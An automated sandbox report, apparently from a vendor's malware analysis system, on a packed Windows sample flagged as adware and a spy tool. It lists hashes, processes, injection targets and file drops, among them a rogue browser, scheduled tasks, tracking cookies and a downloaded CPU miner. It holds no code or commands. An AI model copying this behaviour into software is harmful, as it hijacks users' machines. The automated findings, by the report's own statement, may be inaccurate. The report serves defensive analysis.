not-a-virus:AdWare.NSIS.ConvertAd.nen (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9d05615f932b1d2f6e171c4808abe608
SHA1: fd1e78578a6da615a557d203eaa63eb76c5701bd
SHA256: 893705935b6e5e1a8cc4c077977c4930d140772d53a10e7e3c4e917483a8f73c
SSDeep: 6144: e34/vA58TIYAd bB8WKGbqSPD7zUL7FVw96/ 2x/KHJZ:QTIxIBGhL5y9f2x/Kb
Size: 308150 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
taskkill.exe:1824
taskkill.exe:844
taskkill.exe:2040
6895.exe:928
nsjA.tmp:1028
nsj20.tmp:1672
amisid.exe:1116
nsr4.tmp:1452
upgmsd_re_005010095.exe:436
nsr14.tmp:1568
wmic.exe:1276
nsc18.tmp:1336
encrypt.exe:1052
encrypt.exe:1484
encrypt.exe:1972
encrypt.exe:1512
tasklist.exe:1256
tasklist.exe:1536
setup.exe:2036
%original file name%.exe:396
gmsd_re_005010095.exe:1336
nst1D.tmp:1520
nss2D.tmp:1436
nss2D.tmp:372
The SpyTool injects its code into the following process(es):
nsb27.tmp:1108
nsm34.tmp:1108
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsb27.tmp:1108 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2A.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\registry.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2B.tmp\registry.dll (0 bytes)
The process 6895.exe:928 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\B82B3152-E8DD-4672-BD9-1E9973F4C5A3\B82B3152-E8DD-4672-BD9-1E9973F4C5A3.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\chrome.packed.7z (1308045 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yelp.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\ted.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\gmail.ico (1601 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].003 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\google_translate.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\walmart.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\wikipedia.ico (1913 bytes)
%WinDir%\Tasks\B82B3152-E8DD-4672-BD9-1E9973F4C5A3.job (1656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\twitter.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4895\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\B82B3152-E8DD-4672-BD9-1E9973F4C5A3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%WinDir%\Tasks\B82B3152-E8DD-4672-BD9-1E9973F4C5A3.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\B82B3152-E8DD-4672-BD9-1E9973F4C5A3\B82B3152-E8DD-4672-BD9-1E9973F4C5A3.exe (0 bytes)
The process nsjA.tmp:1028 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuF.tmp (11240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj20.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc18.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm34.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\56xtF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2D.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vos[1].htm (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1D.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw13.tmp (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr14.tmp (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (75 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsj20.tmp:1672 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp22.tmp (0 bytes)
The process nsr4.tmp:1452 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr7.tmp (6720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process upgmsd_re_005010095.exe:436 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.cyl (428 bytes)
The process nsr14.tmp:1568 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm16.tmp (0 bytes)
The process wmic.exe:1276 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
The process nsm34.tmp:1108 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (5152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi39.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd38.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup[1].exe (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp\inetc.dll (20 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd38.tmp (0 bytes)
The process nsc18.tmp:1336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1B.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1A.tmp (0 bytes)
The process encrypt.exe:1052 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gamesdesktop_widget.exe (92316 bytes)
The process encrypt.exe:1484 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\predm.exe (1447 bytes)
The process encrypt.exe:1972 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gmsd_re_005010095.exe (31990 bytes)
The process encrypt.exe:1512 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\upgmsd_re_005010095.exe (24211 bytes)
The process setup.exe:2036 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
